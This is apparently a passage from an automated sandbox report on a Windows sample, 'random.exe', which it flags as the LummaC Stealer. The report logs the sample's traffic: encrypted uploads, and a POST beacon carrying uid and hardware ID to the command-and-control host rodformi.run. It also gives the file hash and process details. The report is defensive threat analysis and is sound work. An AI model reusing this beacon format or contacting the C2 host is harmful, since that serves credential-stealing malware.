                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: c8 ca 9f 8d 5e 07 1f a3 25 1f e3 f2 3f 8f d8 a2 bc 37 0c e3 a1 d9 a6 2c a8 90 44 df 47 69 95 ec ea e2 47 fd e4 76 65 29 14 f7 d2 40 e3 b3 72 f2 5b d7 84 1d c9 34 fa 3a e5 25 8e 4f f3 2d e1 62 59 22 bc 61 d7 c6 12 11 17 31 c2 1d 7f 72 3e 96 09 c4 f0 fc 88 29 a2 e0 15 54 b9 92 a5 e4 9e 1a 2c 42 f3 6c 67 4a 58 c5 45 e3 2d dc 1e 04 5b 28 d0 d8 48 a9 36 63 3d 0a b4 03 ea 91 51 ba 05 6f fb 82 ac 8c 5c f0 fe 91 f1 56 d8 e3 cd 5c 6a ec f9 3d 11 2c bc a8 c3 06 ba 3b 6d bc 7f 69 9a 4d 7e bc 27 61 08 51 ce d0 15 d3 05 2d 75 21 bd 95 2c 45 0d 9e 3b 39 d0 c0 51 24 27 af 62 01 96 1e 92 60 78 1b c0 78 36 2a 25 d3 b9 f1 05 b2 55 27 0c 84 51 a0 7f 60 da 66 63 86 bf da 28 1e f5 d1 44 69 af 7c bb f8 72 35 d6 a6 c3 9d 31 9d 0f 2a 11 42 45 8e 8c 2c 93 c4 0b 17 01 d3 61 3e 10
                                                                                              Data Ascii: ^%?7,DGiGve)@r[4:%O-bY"a1r>)T,BlgJXE-[(H6c=Qo\V\j=,;miM~'aQ-u!,E;9Q$'b`xx6*%U'Q`fc(Di|r51*BE,a>
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: 63 69 38 48 6e aa 21 15 f2 bc 7c ec 49 4b 33 43 a2 4c 69 f0 18 69 be cb 7e 5f b4 5f fb cc b4 df 73 10 ab 3a 9b bc e9 1f 62 10 ff 61 a8 13 69 d0 46 74 43 d0 0b 67 91 70 7f c3 77 53 39 f8 cc c7 72 17 e0 02 77 c5 81 e2 4b 1c 0d 32 5a 8d 84 00 bd 47 41 4b 99 ee 9c 49 fe ab 80 af 04 fe ea 3d 1a 12 1c cd 87 7c ac 36 5c 42 16 0e bc 95 38 15 38 d2 0d 83 d9 e4 f7 cb 41 34 db ae f8 cb 7d 1f cc c0 83 92 13 a4 69 e3 11 1e c6 35 0a f2 2e e6 6f cf 7b 1d 67 15 c2 be b6 9e 98 43 05 a4 34 7b 41 23 71 21 91 58 ce b0 5c f8 44 cd ee ce 9a 0a ff 0b 2a 37 bf fc d7 68 34 f0 cc 5a 47 48 bf 4c b8 33 c8 12 a4 f3 21 c0 86 ca 91 9c 61 32 11 02 14 39 ee e8 2d 06 4d 2a c9 5f a8 7c f1 0b 74 e3 f0 9c 22 81 14 90 2b d9 6c 2a 4a 91 2c e6 07 36 e8 06 26 1e 32 8d 32 e1 a6 3e d2 c4 24 76 e0
                                                                                              Data Ascii: ci8Hn!|IK3CLii~__s:baiFtCgpwS9rwK2ZGAKI=|6\B88A4}i5.o{gC4{A#q!X\D*7h4ZGHL3!a29-M*_|t"+l*J,6&22>$v
                                                                                              2025-04-02 09:33:31 UTC812INHTTP/1.1 200 OK
                                                                                              Date: Wed, 02 Apr 2025 09:33:31 GMT
                                                                                              Content-Type: application/json
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62hGGb642nvfHCbXrhnw3nyFLxHUU5uOkCFJJv94i2Vv92du7nDfDYVWnbPczVP%2BgcxVqn2EfDj1VAKEHxmAgYOBU%2B6ek3%2B0uT%2BzmeaHbN7flvz%2FDHeIxIIiuDYQrKU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 929f5335fe3c4271-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=99958&min_rtt=98077&rtt_var=22650&sent=268&recv=452&lost=0&retrans=0&sent_bytes=2825&recv_bytes=552959&delivery_rate=37976&cwnd=238&unsent_bytes=0&cid=4cd064f4f2c7198e&ts=1613&x=0"


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.1049687172.67.197.674436208C:\Users\user\Desktop\random.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-04-02 09:33:31 UTC264OUTPOST /aUosoz HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                              Content-Length: 103
                                                                                              Host: rodformi.run
                                                                                              2025-04-02 09:33:31 UTC103OUTData Raw: 75 69 64 3d 36 30 62 39 66 39 65 35 34 37 36 65 35 61 64 64 65 62 64 33 35 65 65 37 38 33 31 39 33 34 34 38 32 30 63 39 34 32 36 37 38 64 63 62 61 33 63 38 33 31 30 66 39 37 37 37 26 63 69 64 3d 26 68 77 69 64 3d 42 41 45 32 35 35 33 38 35 42 46 41 32 39 44 44 46 33 45 39 36 42 31 41 32 43 32 42 39 33 46 37
                                                                                              Data Ascii: uid=60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777&cid=&hwid=BAE255385BFA29DDF3E96B1A2C2B93F7
                                                                                              2025-04-02 09:33:32 UTC780INHTTP/1.1 200 OK
                                                                                              Date: Wed, 02 Apr 2025 09:33:32 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 43
                                                                                              Connection: close
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xpbOEFsj1DulsTb%2FHdkOocOhK3JQvephX%2BiNrRzXvRLKVhLPW4f5PK326%2BS0%2BcOHZobbW7puOQ5o03J9PppdAF1vABbDUagNdxsCSJ9S0muUb7RW9ZHdvLabS9jXJys%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 929f53426a21acc5-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=97547&min_rtt=97290&rtt_var=20912&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1003&delivery_rate=37984&cwnd=241&unsent_bytes=0&cid=661a18a4c04eb084&ts=413&x=0"
                                                                                              2025-04-02 09:33:32 UTC43INData Raw: c2 72 01 bb 07 05 93 54 94 9a b2 b1 f8 6e 63 58 05 cd 74 e5 ab d2 c8 47 8c 01 67 f9 68 4c bd 18 68 ae 52 00 2c 9f 85 38 d7 3a a9
                                                                                              Data Ascii: rTncXtGghLhR,8:


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              051015s020406080100

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              051015s0.005101520MB

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              • File
                                                                                              • Registry

                                                                                              Click to dive into process behavior distribution

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:05:33:19
                                                                                              Start date:02/04/2025
                                                                                              Path:C:\Users\user\Desktop\random.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\random.exe"
                                                                                              Imagebase:0xe80000
                                                                                              File size:1'872'896 bytes
                                                                                              MD5 hash:7DDD1B8A415ABF939FFF535A63D55852
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1046421738.0000000005400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true
                                                                                              Show Windows behavior

                                                                                              File Activities

                                                                                              Show Windows behavior

                                                                                              Section Activities

                                                                                              Show Windows behavior

                                                                                              Registry Activities

                                                                                              Show Windows behavior

                                                                                              COM Activities

                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                              Show Windows behavior

                                                                                              Process Activities

                                                                                              Show Windows behavior

                                                                                              Thread Activities

                                                                                              Show Windows behavior

                                                                                              Memory Activities

                                                                                              Show Windows behavior

                                                                                              System Activities

                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                              Show Windows behavior

                                                                                              Windows UI Activities

                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                              Disassembly

                                                                                              No disassembly